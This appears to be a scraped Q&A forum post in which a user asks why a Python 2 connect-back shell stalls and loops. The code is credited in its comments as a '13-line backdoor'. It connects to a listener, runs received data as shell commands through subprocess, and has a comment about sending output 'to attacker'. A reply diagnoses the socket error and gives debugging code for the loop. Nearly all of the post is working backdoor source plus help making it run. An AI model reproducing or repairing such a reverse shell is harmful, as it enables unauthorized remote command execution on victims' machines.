Why does this code keep looping on the first 12 lines of coding?
Question
(Just assume that all of the indents and whitespace is correct)
#! /usr/bin/env python
# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.
# Based on the Python connect back shell written by David Kennedy
# http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import socket
import subprocess
import sys
import time
HOST = '127.0.0.1'
PORT = 8080
print "Starting Listener and Reverse Shell proccess."
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Okay #1"
s.connect((host, port))
print "Accessing..."
return s
def wait_for_command(s):
data = s.recv(1024)
print "Phase three, completed"
if data == "quit\n":
s.close()
sys.exit(0)
print "Socket Closed. Unable to boot."
# the socket died
elif len(data)==0:
return True
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
print "I think this worked..."
return False
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
This code keeps looping up until it says print "Okay #1". It doesn't seem to move on to the other code lines. I first tried to make this kind of script myself but kept failing so I went to the internet for help. this code took a while to execute so I put print scripts so I can see if this is working properly.
1 answers
solution1
0 2013-12-25 15:07:17
Your connect method is throwing an exception when calling s.connect((host,port)) . It prints "Okay #1" but then the next line blows up. So, then it jumps to your except socket.error block and calls pass . It then sleeps for 5ms and then tries all over again, resulting in the same exact thing.
Can you find out what the socket.error is and log it?
Perhaps you can try this (this is based on this link ):
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error, (value,message):
if s:
s.close()
print "Could not open socket: " + message
sys.exit(1)
time.sleep(5)
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.